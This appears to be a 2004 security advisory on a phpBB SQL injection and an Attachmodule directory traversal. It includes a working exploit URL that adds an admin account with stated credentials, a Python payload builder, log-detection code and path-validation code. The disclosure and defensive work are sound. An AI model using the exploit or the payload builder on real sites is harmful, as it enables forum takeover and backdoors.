[UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal

From: SecuriTeam (support_at_securiteam.com)
Date: 11/29/04

  • Next message: SecuriTeam: "[NT] MailEnable IMAP Service Remote Buffer Overflow"
    To: list@securiteam.com
    Date: 29 Nov 2004 10:54:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      phpBB SQL Injection and Attachmodule Add-On Directory Traversal
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and
    highly customizable open-source bulletin board package. phpBB has a
    user-friendly interface, simple and straightforward administration panel,
    and helpful FAQ. Based on the powerful PHP server language and your choice
    of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
    ideal free community solution for all web sites."

    An SQL injection vulnerability exists in phpBB itself, and a directory
    traversal vulnerability exists in the Attachmodule add-on.

    DETAILS

    Vulnerable Systems:
     * phpBB versions prior to 2.0.11
     * Attachmodule, all versions

    Immune Systems:
     * phpBB version 2.0.11

    phpBB URL-decodes request input a second time after the web server has
    already decoded it once. An attacker can therefore smuggle characters past
    the first decode: a double-encoded quote (%2527) reaches phpBB as %27 and
    becomes a literal quote that closes the string in which the 'highlight'
    value is embedded. On close inspection of the code it became evident that
    spelling the payload as a chain of chr() calls, so that it contains no
    quote characters of its own, fools phpBB's handling of the value; the
    decoded value is then evaluated, which is how the mysql_query() call in
    the proof of concept below issues an arbitrary SQL statement against the
    back-end database. Any SQL query can be injected this way.

    The following SQL statement, which the proof of concept issues, adds a
    user with administrative rights (user_level 1 is the administrator level
    in phpBB 2):
    INSERT INTO phpbb_users(user_id, user_active, username, user_password,
    user_level) VALUES ('99999', '1', 'ze3lock',
    'ba3c83348bddf7b368b478ac06d3340e', '1')

    The resulting account logs in with the following credentials:
    username: ze3lock
    pass: thepass

    Note: This query assumes that the phpBB user table is called
    'phpbb_users', which is the default table prefix and therefore holds for
    most sites running phpBB. Sites whose table prefix was changed at
    installation will not be affected by this exact query; the correct table
    name has to be discovered before exploitation can take place.

    The exploit can be run against any site using phpBB without registering
    an account. This makes it a prime target for automated scripts that insert
    backdoors into many sites across the web. A proof-of-concept HTTP query is
    provided below. To make it work, the 't' parameter must be set to an
    existing topic id on the target forum, which is trivial to find. The URL
    is shown wrapped for readability and must be sent as a single line.

    http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
    %252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
    %252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
    %252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
    %252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
    %252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
    %252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
    %252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
    %252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
    %252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
    %252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
    %252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
    %252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
    %252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
    %252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
    %252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
    %252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
    %252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
    %252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
    %252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
    %252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
    %252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
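    The two encoding layers described above can be checked rather than taken on
    trust. The following script is an added example, not code from the advisory
    or from phpBB: it rebuilds the highlight= value of the proof of concept from
    the INSERT statement quoted above, decodes it the way the web server and then
    phpBB would, recovers the statement from the chr() chain, and flags the
    pattern in constructed access-log lines (the log lines and the detection
    rule are the editor's, not the advisory's). It uses only the Python standard
    library.

```python
"""Added example, not part of the SecuriTeam advisory or of phpBB: rebuild
the double-encoded chr() payload from the SQL statement quoted above, decode
it the way the web server and phpBB would, and flag such requests in an
access log. Uses only the Python standard library."""
import hashlib
import re
from urllib.parse import unquote

# The INSERT quoted in the advisory, spelled exactly as the proof of
# concept's chr() chain spells it (no spaces after the commas).
ADVISORY_SQL = (
    "INSERT INTO phpbb_users(user_id,user_active,username,user_password,"
    "user_level) VALUES ('99999','1','ze3lock',"
    "'ba3c83348bddf7b368b478ac06d3340e','1')"
)


def to_chr_chain(text):
    """Spell text as chr(N).chr(N)... so the payload needs no quotes."""
    return ".".join("chr(%d)" % ord(c) for c in text)


def build_highlight(sql):
    """Produce the highlight= value the proof of concept uses.

    Two encoding layers are stacked:
      %2527 -> (server decode) %27 -> (phpBB urldecode) '
      %252e -> (server decode) %2e -> (phpBB urldecode) .
    After both decodes the value reads  '.mysql_query(chr(..)...).'  : the
    quotes close and reopen the string the highlight word is embedded in,
    so the mysql_query() call is evaluated by phpBB.
    """
    chain = to_chr_chain(sql).replace(".", "%252e")
    return "%2527%252emysql_query(" + chain + ")%252e%2527"


def decode_highlight(value):
    """Apply both decoding layers: the web server's and phpBB's own."""
    return unquote(unquote(value))


CHR_RE = re.compile(r"chr\((\d+)\)")


def recover_sql(value):
    """Return the statement hidden in a highlight value's chr() chain."""
    php = decode_highlight(value)
    m = re.search(r"mysql_query\(((?:chr\(\d+\)\.?)+)\)", php)
    if not m:
        raise ValueError("no mysql_query(chr()...) chain in highlight value")
    return "".join(chr(int(n)) for n in CHR_RE.findall(m.group(1)))


def hash_matches_password(sql, password):
    """phpBB 2 stores MD5(password); check the 32-hex hash in the INSERT
    against a candidate password (the advisory claims 'thepass')."""
    m = re.search(r"'([0-9a-f]{32})'", sql)
    return bool(m) and m.group(1) == hashlib.md5(password.encode()).hexdigest()


# Detection: a legitimate search term arrives single-encoded (a quote as
# %27), so double-encoded quotes/dots or a chr( chain in highlight= is a
# strong indicator of this exploit.
SUSPICIOUS = re.compile(r"highlight=[^&\s\"]*(%2527|%252e|chr\()", re.I)


def flag_requests(log_lines):
    """Return the access-log lines that carry the exploit pattern."""
    return [l for l in log_lines
            if "viewtopic.php" in l and SUSPICIOUS.search(l)]


# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Nov/2004:10:54:57 +0200] "GET /forum/viewtopic.php'
    '?t=30&highlight=don%27t HTTP/1.1" 200 5120',
    '10.0.0.9 - - [29/Nov/2004:10:55:01 +0200] "GET /forum/viewtopic.php'
    '?t=30&highlight=' + build_highlight(ADVISORY_SQL)[:60] + ' HTTP/1.1" 200 5120',
    '10.0.0.9 - - [29/Nov/2004:10:55:02 +0200] "GET /forum/index.php'
    ' HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    payload = build_highlight(ADVISORY_SQL)
    print(payload[:70] + "...")
    print(recover_sql(payload))
    print("hash is md5('thepass'):", hash_matches_password(ADVISORY_SQL, "thepass"))
    print("flagged:", flag_requests(SAMPLE_LOG))
```

    The rebuilt value starts with the same bytes as the proof of concept above
    (%2527%252emysql_query(chr(73)%252echr(78)...), which confirms the two-layer
    encoding. The detection rule deliberately ignores a single %27, since a
    normal search for a word containing an apostrophe is encoded that way; only
    the double-encoded form or a chr( chain survives the first decode intact.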

    In addition, a directory traversal bug in Attachmodule allows a user to
    read any file located on the local filesystem of the server running
    phpBB. The main culprit is the 'UPLOAD_DIR' argument, which is not
    sanitized. It names the directory into which all uploaded files are
    written, yet the code accepts any characters in it, including path
    separators and '..' sequences, so uploads can be steered outside the
    intended directory. An attacker is thus also able to overwrite files on
    the local filesystem of the server.

    Vendor Status:
    Users of this system are highly encouraged to upgrade to phpBB version
    2.0.11 and to add input validation to the 'UPLOAD_DIR' argument of
    Attachmodule.
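    The validation asked for above, as an added example that is not code from
    the advisory or from Attachmodule (which is PHP): a naive destination path
    built the way an unvalidated UPLOAD_DIR amounts to, beside a hardened
    version that allowlists the directory syntax, keeps only the file's base
    name, resolves symlinks and refuses any result outside the upload root. The
    base directory '/srv/forum/files' and the sample inputs are hypothetical.
    Written in Python for the same reason as the previous example; the checks
    carry over to PHP's realpath() and basename() directly.

```python
"""Added example, not code from the advisory or from Attachmodule (which is
PHP): the input validation the vendor-status note asks for on an
upload-directory argument, shown in Python against a hypothetical base
directory. Uses only the Python standard library."""
import os
import re

# Allowed directory syntax: letters, digits, '_' and '-' per segment, '/'
# between segments. No dots (so neither '..' nor hidden directories get
# through) and no leading '/'.
SAFE_DIR = re.compile(r"[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*")


def naive_target(base, upload_dir, filename):
    """What an unvalidated UPLOAD_DIR amounts to: the client-supplied
    directory is joined straight into the destination path. Note that
    os.path.join() throws base away entirely when upload_dir is absolute."""
    return os.path.normpath(os.path.join(base, upload_dir, filename))


def safe_target(base, upload_dir, filename):
    """Hardened form: allowlist the directory syntax, keep only the file's
    base name, resolve symlinks, and insist the result stays under base.
    Raises ValueError on anything that would escape."""
    if not SAFE_DIR.fullmatch(upload_dir):
        raise ValueError("upload_dir contains disallowed characters: %r" % upload_dir)
    if filename in ("", ".", "..") or os.path.basename(filename) != filename:
        raise ValueError("filename must be a bare name: %r" % filename)
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, upload_dir, filename))
    # realpath() also follows symlinks, so a link planted inside the upload
    # tree that points elsewhere is caught here, not just '..' sequences.
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("resolved path %s escapes %s" % (target, base_real))
    return target


def is_accepted(base, upload_dir, filename):
    """True if safe_target() would allow the write."""
    try:
        safe_target(base, upload_dir, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    base = "/srv/forum/files"  # hypothetical upload root
    for d, f in [("attach/2004", "report.pdf"),
                 ("../../../etc", "passwd"),
                 ("/etc", "passwd"),
                 ("attach", "../config.php")]:
        print("%-14s %-12s naive=%-32s safe=%s" % (
            d, f, naive_target(base, d, f), is_accepted(base, d, f)))
```

    The allowlist alone would stop the '..' and absolute-path cases; the
    realpath() and commonpath() check is what additionally defeats a symlink
    inside the upload tree, which is why both are kept.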

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:zee@psybnc.it> Zeelock.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

